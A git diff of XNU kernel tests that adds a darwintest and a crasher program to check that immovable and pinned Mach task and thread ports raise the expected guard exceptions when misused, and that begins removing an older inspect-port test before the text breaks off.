+#include +#include +#include +#include +#include +#include +#include +#include + +#define MAX_ARGV 3 /* size of the argv array handed to posix_spawn(): program, test number, NULL */ +#define EXC_CODE_SHIFT 32 /* shift applied to the received EXC_GUARD code before comparing it with the expected value */ +#define EXC_GUARD_TYPE_SHIFT 29 +#define MAX_TEST_NUM 13 /* number of crasher cases spawned by the main test loop */ + +#define TASK_EXC_GUARD_MP_DELIVER 0x10 /* bit checked in the kern.task_exc_guard_default sysctl value */ + +extern char **environ; +static uint64_t exception_code = 0; +static exception_type_t exception_taken = 0; + +#define IKOT_TASK_CONTROL 2 + +/* + * This test verifies behaviors of immovable/pinned task/thread ports. + * + * 1. Compare and verify port names of mach_{task, thread}_self(), + * {TASK, THREAD}_KERNEL_PORT, and ports returned from task_threads() + * and processor_set_tasks(). + * 2. 
Make sure correct exceptions are raised resulting from moving immovable + * task/thread control, read and inspect ports. + * 3. Make sure correct exceptions are raised resulting from deallocating pinned + * task/thread control ports. + * 4. Make sure immovable ports cannot be stashed: + * rdar://70585367 (Disallow immovable port stashing with *_set_special_port() and mach_port_register()) + */ +T_GLOBAL_META( + T_META_NAMESPACE("xnu.ipc"), + T_META_RUN_CONCURRENTLY(TRUE)); + +/* Expected exception code for each child test, indexed by the test number passed to the crasher. */ +static uint64_t test_exception_code[] = { + /* Pinning tests. Currently delivered as soft crash */ + EXC_GUARD, // Soft crash delivered as EXC_CORPSE_NOTIFY + EXC_GUARD, + EXC_GUARD, + EXC_GUARD, + EXC_GUARD, + + /* Immovable tests. Currently delivered as hard crash */ + (GUARD_TYPE_MACH_PORT << EXC_GUARD_TYPE_SHIFT) | kGUARD_EXC_IMMOVABLE, + (GUARD_TYPE_MACH_PORT << EXC_GUARD_TYPE_SHIFT) | kGUARD_EXC_IMMOVABLE, + (GUARD_TYPE_MACH_PORT << EXC_GUARD_TYPE_SHIFT) | kGUARD_EXC_IMMOVABLE, + (GUARD_TYPE_MACH_PORT << EXC_GUARD_TYPE_SHIFT) | kGUARD_EXC_IMMOVABLE, + (GUARD_TYPE_MACH_PORT << EXC_GUARD_TYPE_SHIFT) | kGUARD_EXC_IMMOVABLE, + (GUARD_TYPE_MACH_PORT << EXC_GUARD_TYPE_SHIFT) | kGUARD_EXC_IMMOVABLE, + (GUARD_TYPE_MACH_PORT << EXC_GUARD_TYPE_SHIFT) | kGUARD_EXC_IMMOVABLE, + (GUARD_TYPE_MACH_PORT << EXC_GUARD_TYPE_SHIFT) | kGUARD_EXC_IMMOVABLE, +}; + +/* State-flavor handler: not supported by this test; fails the test and returns KERN_NOT_SUPPORTED if it is ever called. */ +kern_return_t +catch_mach_exception_raise_state(mach_port_t exception_port, + exception_type_t exception, + const mach_exception_data_t code, + mach_msg_type_number_t code_count, + int * flavor, + const thread_state_t old_state, + mach_msg_type_number_t old_state_count, + thread_state_t new_state, + mach_msg_type_number_t * new_state_count) +{ +#pragma unused(exception_port, exception, code, code_count, flavor, old_state, old_state_count, new_state, new_state_count) + T_FAIL("Unsupported catch_mach_exception_raise_state"); + return KERN_NOT_SUPPORTED; +} + +/* State-identity-flavor handler: likewise unsupported; fails the test if called. */ +kern_return_t +catch_mach_exception_raise_state_identity(mach_port_t exception_port, + 
mach_port_t thread, + mach_port_t task, + exception_type_t exception, + mach_exception_data_t code, + mach_msg_type_number_t code_count, + int * flavor, + thread_state_t old_state, + mach_msg_type_number_t old_state_count, + thread_state_t new_state, + mach_msg_type_number_t * new_state_count) +{ +#pragma unused(exception_port, thread, task, exception, code, code_count, flavor, old_state, old_state_count, new_state, new_state_count) + T_FAIL("Unsupported catch_mach_exception_raise_state_identity"); + return KERN_NOT_SUPPORTED; +} + +/* Exception handler used by the test: logs the crashing pid, drops the thread and task rights it was handed, and records the exception type and first code word when the exception is EXC_GUARD or EXC_CORPSE_NOTIFY (anything else fails the test). */ +kern_return_t +catch_mach_exception_raise(mach_port_t exception_port, + mach_port_t thread, + mach_port_t task, + exception_type_t exception, + mach_exception_data_t code, + mach_msg_type_number_t code_count) +{ +#pragma unused(exception_port, code_count) + pid_t pid; + kern_return_t kr = pid_for_task(task, &pid); + T_EXPECT_MACH_SUCCESS(kr, "pid_for_task"); + T_LOG("Crashing child pid: %d, continuing...\n", pid); + + kr = mach_port_deallocate(mach_task_self(), thread); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); + kr = mach_port_deallocate(mach_task_self(), task); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); + + T_LOG("Caught exception type: %d code: 0x%llx", exception, *((uint64_t*)code)); + if (exception == EXC_GUARD || exception == EXC_CORPSE_NOTIFY) { + exception_taken = exception; + exception_code = *((uint64_t *)code); + } else { + T_FAIL("Unexpected exception"); + } + return KERN_SUCCESS; +} + +/* Thread body: services exactly one exception message on the port that arg points to. */ +static void * +exception_server_thread(void *arg) +{ + kern_return_t kr; + mach_port_t exc_port = *(mach_port_t *)arg; + + /* Handle exceptions on exc_port */ + kr = mach_msg_server_once(mach_exc_server, 4096, exc_port, 0); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_msg_server_once"); + + return NULL; +} + +/* Allocates a receive right and inserts a send right under the same name; returns that port name. */ +static mach_port_t +alloc_exception_port(void) +{ + kern_return_t kret; + mach_port_t exc_port = MACH_PORT_NULL; + mach_port_t task = mach_task_self(); + + kret = mach_port_allocate(task, 
MACH_PORT_RIGHT_RECEIVE, &exc_port); + T_QUIET; T_EXPECT_MACH_SUCCESS(kret, "mach_port_allocate exc_port"); + + kret = mach_port_insert_right(task, exc_port, exc_port, MACH_MSG_TYPE_MAKE_SEND); + T_QUIET; T_EXPECT_MACH_SUCCESS(kret, "mach_port_insert_right exc_port"); + + return exc_port; +} + +/* Checks that the task and thread self ports are rejected with KERN_INVALID_RIGHT by task_set_special_port(), thread_set_special_port() and mach_ports_register(), while an ordinary port is accepted by mach_ports_register(). */ +static void +test_immovable_port_stashing(void) +{ + kern_return_t kr; + mach_port_t port; + + kr = task_set_special_port(mach_task_self(), TASK_BOOTSTRAP_PORT, mach_task_self()); + T_EXPECT_EQ(kr, KERN_INVALID_RIGHT, "should disallow task_set_special_port() with immovable port"); + + kr = thread_set_special_port(mach_thread_self(), THREAD_KERNEL_PORT, mach_thread_self()); + T_EXPECT_EQ(kr, KERN_INVALID_RIGHT, "should disallow thread_set_special_port() with immovable port"); + + mach_port_t stash[1] = {mach_task_self()}; + kr = mach_ports_register(mach_task_self(), stash, 1); + T_EXPECT_EQ(kr, KERN_INVALID_RIGHT, "should disallow mach_ports_register() with immovable port"); + + T_QUIET; T_ASSERT_MACH_SUCCESS(mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port), "mach_port_allocate"); + T_QUIET; T_ASSERT_MACH_SUCCESS(mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND), "mach_port_insert_right"); + + stash[0] = port; + kr = mach_ports_register(mach_task_self(), stash, 1); + T_EXPECT_MACH_SUCCESS(kr, "mach_ports_register() should succeed with movable port"); +} + +/* Compares the names returned by the special-port, task_for_pid(), task_threads() and processor_set_tasks_with_flavor() interfaces against mach_task_self()/mach_thread_self(). */ +static void +test_task_thread_port_values(void) +{ + T_LOG("Compare various task/thread control port values\n"); + kern_return_t kr; + mach_port_t port, th_self; + thread_array_t threadList; + mach_msg_type_number_t threadCount = 0; + boolean_t found_self = false; + processor_set_name_array_t psets; + processor_set_t pset_priv; + task_array_t taskList; + mach_msg_type_number_t pcnt = 0, tcnt = 0; + mach_port_t host = mach_host_self(); + + /* Compare with task/thread_get_special_port() */ + kr = task_get_special_port(mach_task_self(), TASK_KERNEL_PORT, &port); + T_QUIET; 
T_ASSERT_MACH_SUCCESS(kr, "task_get_special_port() - TASK_KERNEL_PORT"); + T_EXPECT_NE(port, mach_task_self(), "TASK_KERNEL_PORT should not match mach_task_self()"); + mach_port_deallocate(mach_task_self(), port); + + /* task_for_pid() on our own pid is expected to return the same name as mach_task_self() */ + kr = task_for_pid(mach_task_self(), getpid(), &port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_for_pid()"); + T_EXPECT_EQ(port, mach_task_self(), "task_for_pid(self) should match mach_task_self()"); + mach_port_deallocate(mach_task_self(), port); + + th_self = mach_thread_self(); + kr = thread_get_special_port(th_self, THREAD_KERNEL_PORT, &port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "thread_get_special_port() - THREAD_KERNEL_PORT"); + T_EXPECT_NE(port, th_self, "THREAD_KERNEL_PORT should not match mach_thread_self()"); + mach_port_deallocate(mach_task_self(), port); + + /* Make sure task_threads() return immovable thread ports */ + kr = task_threads(mach_task_self(), &threadList, &threadCount); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_threads()"); + T_QUIET; T_ASSERT_GE(threadCount, 1, "should have at least 1 thread"); + + for (size_t i = 0; i < threadCount; i++) { + if (th_self == threadList[i]) { /* th_self is immovable */ + found_self = true; + break; + } + } + + T_EXPECT_TRUE(found_self, "task_threads() should return immovable thread self"); + + /* release every thread right returned by task_threads(), then the array itself */ + for (size_t i = 0; i < threadCount; i++) { + mach_port_deallocate(mach_task_self(), threadList[i]); + } + + if (threadCount > 0) { + mach_vm_deallocate(mach_task_self(), + (mach_vm_address_t)threadList, + threadCount * sizeof(mach_port_t)); + } + + mach_port_deallocate(mach_task_self(), th_self); + + /* Make sure processor_set_tasks() return immovable task self */ + kr = host_processor_sets(host, &psets, &pcnt); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "host_processor_sets"); + T_QUIET; T_ASSERT_GE(pcnt, 1, "should have at least 1 processor set"); + + kr = host_processor_set_priv(host, psets[0], &pset_priv); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "host_processor_set_priv"); + for (size_t i = 0; i < pcnt; 
i++) { + mach_port_deallocate(mach_task_self(), psets[i]); + } + mach_port_deallocate(mach_task_self(), host); + vm_deallocate(mach_task_self(), (vm_address_t)psets, (vm_size_t)pcnt * sizeof(mach_port_t)); + + kr = processor_set_tasks_with_flavor(pset_priv, TASK_FLAVOR_CONTROL, &taskList, &tcnt); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "processor_set_tasks_with_flavor"); + T_QUIET; T_ASSERT_GE(tcnt, 1, "should have at least 1 task"); + mach_port_deallocate(mach_task_self(), pset_priv); + + found_self = false; + for (size_t i = 0; i < tcnt; i++) { + if (taskList[i] == mach_task_self()) { + found_self = true; + break; + } + } + + T_EXPECT_TRUE(found_self, " processor_set_tasks() should return immovable task self"); + + for (size_t i = 0; i < tcnt; i++) { + mach_port_deallocate(mach_task_self(), taskList[i]); + } + + if (tcnt > 0) { + mach_vm_deallocate(mach_task_self(), + (mach_vm_address_t)taskList, + tcnt * sizeof(mach_port_t)); + } +} + +/* Main test: skips unless the guard-exception and immovable-control-port sysctls are enabled, runs the in-process port checks, then spawns the crasher once per test number and compares the exception it raises with test_exception_code[]. */ +T_DECL(imm_pinned_control_port, "Test pinned & immovable task and thread control ports", + T_META_IGNORECRASHES(".*pinned_rights_child.*"), + T_META_CHECK_LEAKS(false)) +{ + uint32_t task_exc_guard = 0; + size_t te_size = sizeof(task_exc_guard); /* size of the value, not of a pointer to it */ + posix_spawnattr_t attrs; + char *test_prog_name = "./imm_pinned_control_port_crasher"; + char *child_args[MAX_ARGV]; + pid_t client_pid = 0; + uint32_t opts = 0; + size_t size = sizeof(opts); /* size of the value, not of a pointer to it */ + mach_port_t exc_port; + pthread_t s_exc_thread; + uint64_t exc_id; + + T_LOG("Check if task_exc_guard exception has been enabled\n"); + int ret = sysctlbyname("kern.task_exc_guard_default", &task_exc_guard, &te_size, NULL, 0); + T_ASSERT_EQ(ret, 0, "sysctlbyname"); + + if (!(task_exc_guard & TASK_EXC_GUARD_MP_DELIVER)) { + T_SKIP("task_exc_guard exception is not enabled"); + } + + T_LOG("Check if immovable control port has been enabled\n"); + ret = sysctlbyname("kern.ipc_control_port_options", &opts, &size, NULL, 0); + + if (!ret && (opts & 0x30) == 0) { + T_SKIP("immovable control port isn't 
enabled"); + } + + /* first, try out comparing various task/thread ports */ + test_task_thread_port_values(); + + /* try stashing immovable ports: rdar://70585367 */ + test_immovable_port_stashing(); + + /* spawn a child and see if EXC_GUARD are correctly generated */ + for (int i = 0; i < MAX_TEST_NUM; i++) { + /* Create the exception port for the child */ + exc_port = alloc_exception_port(); + T_QUIET; T_ASSERT_NE(exc_port, MACH_PORT_NULL, "Create a new exception port"); + + /* Create exception serving thread */ + ret = pthread_create(&s_exc_thread, NULL, exception_server_thread, &exc_port); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_create exception_server_thread"); + + /* Initialize posix_spawn attributes */ + posix_spawnattr_init(&attrs); + + int err = posix_spawnattr_setexceptionports_np(&attrs, EXC_MASK_GUARD | EXC_MASK_CORPSE_NOTIFY, exc_port, + (exception_behavior_t) (EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES), 0); + T_QUIET; T_ASSERT_POSIX_SUCCESS(err, "posix_spawnattr_setexceptionports_np"); + + /* argv for the crasher: program name, test number as a decimal string, NULL */ + child_args[0] = test_prog_name; + char test_num[10]; + snprintf(test_num, sizeof(test_num), "%d", i); + child_args[1] = test_num; + child_args[2] = NULL; + + T_LOG("========== Spawning new child =========="); + err = posix_spawn(&client_pid, child_args[0], NULL, &attrs, &child_args[0], environ); + T_ASSERT_POSIX_SUCCESS(err, "posix_spawn control_port_options_client = %d test_num = %d", client_pid, i); + + /* try extracting child task port: rdar://71744817 + * Moved to tests/extract_right_soft_fail.c + */ + // test_extract_immovable_task_port(client_pid); + + int child_status; + /* Wait for child and check for exception */ + if (-1 == waitpid(-1, &child_status, 0)) { + T_FAIL("waitpid: child mia"); + } + + if (WIFEXITED(child_status) && WEXITSTATUS(child_status)) { + T_FAIL("Child exited with status = %x", child_status); + T_END; + } + + sleep(1); + + /* the server thread returns once it has handled one exception message */ + ret = pthread_join(s_exc_thread, NULL); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_join"); + + if (exception_taken 
== EXC_GUARD) { + exc_id = exception_code >> EXC_CODE_SHIFT; + } else { + exc_id = exception_code; + } + + T_LOG("Exception code: Received code = 0x%llx Expected code = 0x%llx", exc_id, test_exception_code[i]); + T_EXPECT_EQ(exc_id, test_exception_code[i], "Exception code: Received == Expected"); + } +} diff --git a/tests/imm_pinned_control_port_crasher.c b/tests/imm_pinned_control_port_crasher.c new file mode 100644 index 000000000..951ef9e93 --- /dev/null +++ b/tests/imm_pinned_control_port_crasher.c @@ -0,0 +1,262 @@ +#include +#include +#include +#include +#include +#include + +/* + * DO NOT run this test file by itself. + * This test is meant to be invoked by the imm_pinned_control_port darwintest + * (tests/imm_pinned_control_port.c), which spawns it once per test number. + * + * If hard enforcement for pinned control port is on, pinned_test_main_thread_mod_ref-5 are + * expected to generate fatal EXC_GUARD. + * + * If hard enforcement for immovable control port is on, immovable_test_move_send_task_self-13 are + * expected to generate fatal EXC_GUARD. + * + * The type of exception raised (if any) is checked on the imm_pinned_control_port side. 
+ */
+/* Number of entries in the tests[] dispatch table in main(). */
+#define MAX_TEST_NUM 13
+
+/*
+ * Send `port` to a freshly allocated local port using disposition `disp`.
+ *
+ * Allocates a receive right, inserts a send right for it, then sends a complex
+ * message to that port carrying `port` in a single port descriptor.
+ *
+ * Returns the result of mach_msg_send(). The scratch port is not released
+ * here; main() exits right after the selected test returns.
+ */
+static int
+attempt_send_immovable_port(mach_port_name_t port, mach_msg_type_name_t disp)
+{
+	mach_port_t server;
+	kern_return_t kr;
+	kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &server);
+	assert(kr == 0);
+
+	kr = mach_port_insert_right(mach_task_self(), server, server, MACH_MSG_TYPE_MAKE_SEND);
+	assert(kr == 0);
+
+	/*
+	 * Zero the whole message first so that fields not assigned below
+	 * (msgh_voucher_port, msgh_id, descriptor padding) are not sent as
+	 * uninitialized stack contents.
+	 */
+	struct {
+		mach_msg_header_t header;
+		mach_msg_body_t body;
+		mach_msg_port_descriptor_t desc;
+	} msg = {};
+
+	msg.header.msgh_remote_port = server;
+	msg.header.msgh_local_port = MACH_PORT_NULL;
+	msg.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0) | MACH_MSGH_BITS_COMPLEX;
+	msg.header.msgh_size = sizeof msg;
+
+	msg.body.msgh_descriptor_count = 1;
+
+	msg.desc.name = port;
+	msg.desc.disposition = disp;
+	msg.desc.type = MACH_MSG_PORT_DESCRIPTOR;
+
+	return mach_msg_send(&msg.header);
+}
+
+/* Test 0: drop two send-right references from the main thread's self port. */
+static void
+pinned_test_main_thread_mod_ref(void)
+{
+	printf("[Crasher]: Mod refs main thread's self port to 0\n");
+	mach_port_t thread_self = mach_thread_self();
+	kern_return_t kr = mach_port_mod_refs(mach_task_self(), thread_self, MACH_PORT_RIGHT_SEND, -2);
+
+	printf("[Crasher pinned_test_main_thread_mod_ref] mach_port_mod_refs returned %s.\n", mach_error_string(kr));
+}
+
+/*
+ * Thread body for pinned_test_pthread_dealloc(): deallocates the calling
+ * thread's own port as reported by pthread_mach_thread_np(). `arg` is unused;
+ * it exists so the signature matches what pthread_create() expects.
+ */
+static void *
+pthread_run(void *arg)
+{
+	(void)arg;
+
+	printf("[Crasher]: Deallocate pthread_self\n");
+	mach_port_t th_self = pthread_mach_thread_np(pthread_self());
+	kern_return_t kr = mach_port_deallocate(mach_task_self(), th_self);
+
+	printf("[Crasher pinned_test_pthread_dealloc] mach_port_deallocate returned %s.\n", mach_error_string(kr));
+	return NULL;
+}
+
+/* Test 1: run pthread_run() on a new thread and wait for it to finish. */
+static void
+pinned_test_pthread_dealloc(void)
+{
+	printf("[Crasher]: Create a pthread and deallocate its self port\n");
+	pthread_t thread;
+	int ret = pthread_create(&thread, NULL, pthread_run, NULL);
+	assert(ret == 0);
+	ret = pthread_join(thread, NULL);
+	assert(ret == 0);
+}
+
+/* Test 2: call mach_port_deallocate() on mach_task_self() twice in a row. */
+static void
+pinned_test_task_self_dealloc(void)
+{
+	printf("[Crasher]: Deallocate mach_task_self twice\n");
+	mach_port_t task_self = mach_task_self();
+	kern_return_t kr = mach_port_deallocate(task_self, task_self);
+	assert(kr == 0);
+	kr = mach_port_deallocate(task_self, task_self);
+
+	printf("[Crasher pinned_test_task_self_dealloc] mach_port_deallocate returned %s.\n", mach_error_string(kr));
+}
+
+/* Test 3: drop two send-right references from mach_task_self(). */
+static void
+pinned_test_task_self_mod_ref(void)
+{
+	printf("[Crasher]: Mod refs mach_task_self() to 0\n");
+	kern_return_t kr = mach_port_mod_refs(mach_task_self(), mach_task_self(), MACH_PORT_RIGHT_SEND, -2);
+
+	printf("[Crasher pinned_test_task_self_mod_ref] mach_port_mod_refs returned %s.\n", mach_error_string(kr));
+}
+
+/*
+ * Test 4: fetch the thread list with task_threads(), then deallocate and
+ * mod_refs the first returned thread port.
+ */
+static void
+pinned_test_task_threads_mod_ref(void)
+{
+	printf("[Crasher]: task_threads should return pinned thread ports. Mod refs them to 0\n");
+	thread_array_t th_list = NULL;
+	mach_msg_type_number_t th_cnt = 0;
+	kern_return_t kr;
+	mach_port_t th_kp = mach_thread_self();
+	mach_port_deallocate(mach_task_self(), th_kp);
+
+	kr = task_threads(mach_task_self(), &th_list, &th_cnt);
+	/* th_list[0] is only meaningful if task_threads() succeeded with at least one thread */
+	assert(kr == 0 && th_cnt > 0);
+	mach_port_deallocate(mach_task_self(), th_list[0]);
+
+	kr = mach_port_mod_refs(mach_task_self(), th_list[0], MACH_PORT_RIGHT_SEND, -1);
+
+	printf("[Crasher pinned_test_task_threads_mod_ref] mach_port_mod_refs returned %s.\n", mach_error_string(kr));
+}
+
+/* Test 5: send mach_task_self() in a message with MOVE_SEND disposition. */
+static void
+immovable_test_move_send_task_self(void)
+{
+	kern_return_t kr;
+	printf("[Crasher]: Move send mach_task_self_\n");
+	kr = attempt_send_immovable_port(mach_task_self(), MACH_MSG_TYPE_MOVE_SEND);
+
+	printf("[Crasher immovable_test_move_send_task_self] attempt_send_immovable_port returned %s.\n", mach_error_string(kr));
+}
+
+/* Test 6: send mach_task_self() in a message with COPY_SEND disposition. */
+static void
+immovable_test_copy_send_task_self(void)
+{
+	kern_return_t kr;
+	printf("[Crasher]: Copy send mach_task_self_\n");
+	kr = attempt_send_immovable_port(mach_task_self(), MACH_MSG_TYPE_COPY_SEND);
+
+	printf("[Crasher immovable_test_copy_send_task_self] attempt_send_immovable_port returned %s.\n", mach_error_string(kr));
+}
+
+/* Test 7: send the main thread's self port with MOVE_SEND disposition. */
+static void
+immovable_test_move_send_thread_self(void)
+{
+	kern_return_t kr;
+	printf("[Crasher]: Move send main thread's self port\n");
+	kr = attempt_send_immovable_port(mach_thread_self(), MACH_MSG_TYPE_MOVE_SEND);
+
+	printf("[Crasher immovable_test_move_send_thread_self] attempt_send_immovable_port returned %s.\n", mach_error_string(kr));
+}
+
+/* Test 8: send the main thread's self port with COPY_SEND disposition. */
+static void
+immovable_test_copy_send_thread_self(void)
+{
+	kern_return_t kr;
+	mach_port_t port;
+	printf("[Crasher]: Copy send main thread's self port\n");
+	port = mach_thread_self();
+	kr = attempt_send_immovable_port(port, MACH_MSG_TYPE_COPY_SEND);
+	printf("[Crasher immovable_test_copy_send_thread_self] attempt_send_immovable_port returned %s.\n", mach_error_string(kr));
+
+	mach_port_deallocate(mach_task_self(), port);
+}
+
+/* Test 9: fetch TASK_READ_PORT and send it with COPY_SEND disposition. */
+static void
+immovable_test_copy_send_task_read(void)
+{
+	kern_return_t kr;
+	mach_port_t port;
+	printf("[Crasher]: Copy send task read port\n");
+	kr = task_get_special_port(mach_task_self(), TASK_READ_PORT, &port);
+	assert(kr == 0);
+	kr = attempt_send_immovable_port(port, MACH_MSG_TYPE_COPY_SEND);
+	printf("[Crasher immovable_test_copy_send_task_read] attempt_send_immovable_port returned %s.\n", mach_error_string(kr));
+
+	mach_port_deallocate(mach_task_self(), port);
+}
+
+/*
+ * Test 10: fetch TASK_INSPECT_PORT and send it with MOVE_SEND disposition.
+ *
+ * NOTE(review): the function name says "copy_send" but both the log line and
+ * the disposition are MOVE_SEND. Left as-is because the expected exception
+ * codes are checked by the parent test; confirm which one is intended.
+ */
+static void
+immovable_test_copy_send_task_inspect(void)
+{
+	kern_return_t kr;
+	mach_port_t port;
+	printf("[Crasher]: Move send task inspect port\n");
+	kr = task_get_special_port(mach_task_self(), TASK_INSPECT_PORT, &port);
+	assert(kr == 0);
+	kr = attempt_send_immovable_port(port, MACH_MSG_TYPE_MOVE_SEND);
+	printf("[Crasher immovable_test_copy_send_task_inspect] attempt_send_immovable_port returned %s.\n", mach_error_string(kr));
+}
+
+/* Test 11: fetch THREAD_INSPECT_PORT and send it with MOVE_SEND disposition. */
+static void
+immovable_test_move_send_thread_inspect(void)
+{
+	kern_return_t kr;
+	mach_port_t port;
+	mach_port_t th_port = mach_thread_self();
+
+	printf("[Crasher]: Move send thread inspect port\n");
+	kr = thread_get_special_port(th_port, THREAD_INSPECT_PORT, &port);
+	assert(kr == 0);
+	kr = attempt_send_immovable_port(port, MACH_MSG_TYPE_MOVE_SEND);
+	printf("[Crasher immovable_test_move_send_thread_inspect] attempt_send_immovable_port returned %s.\n", mach_error_string(kr));
+
+	mach_port_deallocate(mach_task_self(), th_port);
+}
+
+/* Test 12: fetch THREAD_READ_PORT and send it with COPY_SEND disposition. */
+static void
+immovable_test_copy_send_thread_read(void)
+{
+	kern_return_t kr;
+	mach_port_t port;
+	mach_port_t th_port = mach_thread_self();
+
+	printf("[Crasher]: Copy send thread read port\n");
+	kr = thread_get_special_port(th_port, THREAD_READ_PORT, &port);
+	assert(kr == 0);
+	kr = attempt_send_immovable_port(port, MACH_MSG_TYPE_COPY_SEND);
+	printf("[Crasher immovable_test_copy_send_thread_read] attempt_send_immovable_port returned %s.\n", mach_error_string(kr));
+
+	mach_port_deallocate(mach_task_self(), port);
+	mach_port_deallocate(mach_task_self(), th_port);
+}
+
+/*
+ * Entry point: argv[1] is the decimal index of the test to run, in the range
+ * [0, MAX_TEST_NUM). Exits with 0 once the selected test returns, or with -1
+ * when the argument is missing or is not a valid index.
+ */
+int
+main(int argc, char *argv[])
+{
+	void (*tests[MAX_TEST_NUM])(void) = {
+		pinned_test_main_thread_mod_ref,
+		pinned_test_pthread_dealloc,
+		pinned_test_task_self_dealloc,
+		pinned_test_task_self_mod_ref,
+		pinned_test_task_threads_mod_ref,
+
+		immovable_test_move_send_task_self,
+		immovable_test_copy_send_task_self,
+		immovable_test_move_send_thread_self,
+		immovable_test_copy_send_thread_self,
+		immovable_test_copy_send_task_read,
+		immovable_test_copy_send_task_inspect,
+		immovable_test_move_send_thread_inspect,
+		immovable_test_copy_send_thread_read,
+	};
+	printf("[Crasher]: My Pid: %d\n", getpid());
+
+	if (argc < 2) {
+		printf("[Crasher]: Specify a test to run.\n");
+		exit(-1);
+	}
+
+	/*
+	 * strtol() with an end-pointer check rejects empty or non-numeric input,
+	 * which atoi() would silently turn into test 0.
+	 */
+	char *end = NULL;
+	long test_num = strtol(argv[1], &end, 10);
+
+	if (end == argv[1] || *end != '\0' || test_num < 0 || test_num >= MAX_TEST_NUM) {
+		printf("[Crasher]: Invalid test num. Exiting...\n");
+		exit(-1);
+	}
+
+	(*tests[test_num])();
+
+	exit(0);
+}
diff --git a/tests/inspect_port.c b/tests/inspect_port.c
deleted file mode 100644
index b128b5b41..000000000
--- a/tests/inspect_port.c
+++ /dev/null
@@ -1,581 +0,0 @@
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-
-int task_for_pid(mach_port_name_t target_tport, int pid, mach_port_name_t *t);
-int task_read_for_pid(mach_port_name_t target_tport, int pid, mach_port_name_t *t);
-int task_inspect_for_pid(mach_port_name_t target_tport, int pid, mach_port_name_t *t);
-int task_name_for_pid(mach_port_name_t target_tport, int pid, mach_port_name_t *t);
-static int test_conversion_eval(pid_t current, pid_t victim, int translation);
-
-static int g_tfpFail = 0;
-static int g_trfpFail = 0;
-static int g_tifpFail = 0;
-static int g_tnfpFail = 0;
-
-static pthread_mutex_t g_lock;
-
-#define NAME 0
-#define INSPECT 1
-#define READ 2
-#define FULL 3
-#define POLY 4
-
-/*
- * 3. child still spawn as platform binary
- */
-
-/* Mimic the behavior of task_conversion_eval in kernel.
- */ -static int -test_conversion_eval(pid_t current, pid_t victim, int translation) -{ - uint32_t my_csflags = 0; - uint32_t victim_csflags = 0; - csops(victim, CS_OPS_STATUS, &victim_csflags, sizeof(victim_csflags)); - csops(current, CS_OPS_STATUS, &my_csflags, sizeof(my_csflags)); - - switch (translation) { - case FULL: - case READ: - if (victim == 0) { - return false; - } - if (!(my_csflags & CS_PLATFORM_BINARY) && (victim_csflags & CS_PLATFORM_BINARY)) { - return false; - } - break; - default: - break; - } - - return true; -} - -static void -check_result(kern_return_t kr, int port_type, int translation, int low, char *test_str, pid_t victim) -{ - char error[100]; - - if (translation == POLY) { - if (port_type == FULL) { - translation = INSPECT; - } else { - translation = port_type; - } - } - - if (port_type < low) { - goto fail; - } else if (port_type < translation) { - goto fail; - } else if (!test_conversion_eval(getpid(), victim, translation)) { - goto fail; - } else { - goto success; - } - -fail: - snprintf(error, sizeof(error), "%s should fail with %d on %d.\n", test_str, port_type, victim); - T_QUIET; T_EXPECT_NE(kr, 0, "check_result: %s", error); - return; -success: - snprintf(error, sizeof(error), "%s should succeed with %d on %d.\n", test_str, port_type, victim); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "check_result: %s", error); - return; -} - -static void -test_thread_port(mach_port_name_t thread, int type, pid_t victim) -{ - kern_return_t kr; - mach_port_t name = MACH_PORT_NULL; - thread_info_data_t th_info; - mach_msg_type_number_t th_info_cnt = THREAD_INFO_MAX; - - kr = thread_info(thread, THREAD_BASIC_INFO, (thread_info_t)th_info, &th_info_cnt); - check_result(kr, type, INSPECT, INSPECT, "thread_info", victim); - - kr = thread_get_special_port(thread, THREAD_KERNEL_PORT, &name); - check_result(kr, type, POLY, FULL, "thread_get_special_port: THREAD_KERNEL_PORT", victim); - kr = mach_port_deallocate(mach_task_self(), name); - T_QUIET; 
T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - - kr = thread_get_special_port(thread, THREAD_READ_PORT, &name); - check_result(kr, type, POLY, READ, "thread_get_special_port: THREAD_READ_PORT", victim); - kr = mach_port_deallocate(mach_task_self(), name); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - - kr = thread_get_special_port(thread, THREAD_INSPECT_PORT, &name); - check_result(kr, type, POLY, INSPECT, "thread_get_special_port: THREAD_INSPECT_PORT", victim); - kr = mach_port_deallocate(mach_task_self(), name); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); -} - -static void -test_task_port(mach_port_name_t port, int type) -{ - kern_return_t kr; - volatile int data = 0x4141; - volatile int new_value = 0x4242; - pid_t victim; - if (port == MACH_PORT_NULL) { - return; - } - kr = pid_for_task(port, &victim); - if (victim == -1) { - T_LOG("pid_for_task: port = 0x%x, type = %u is not valid anymore", port, type); - return; - } - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "pid_for_task, port = 0x%x, type = %u, pid = %u", port, type, victim); - - /************* TASK_INFO ************/ - struct task_basic_info info = {}; - mach_msg_type_number_t cnt = sizeof(info); - kr = task_info(port, TASK_BASIC_INFO, (task_info_t)&info, &cnt); - check_result(kr, type, NAME, NAME, "task_info", victim); - - /************ MACH_VM_* ************/ - - if (victim == getpid()) { - kr = 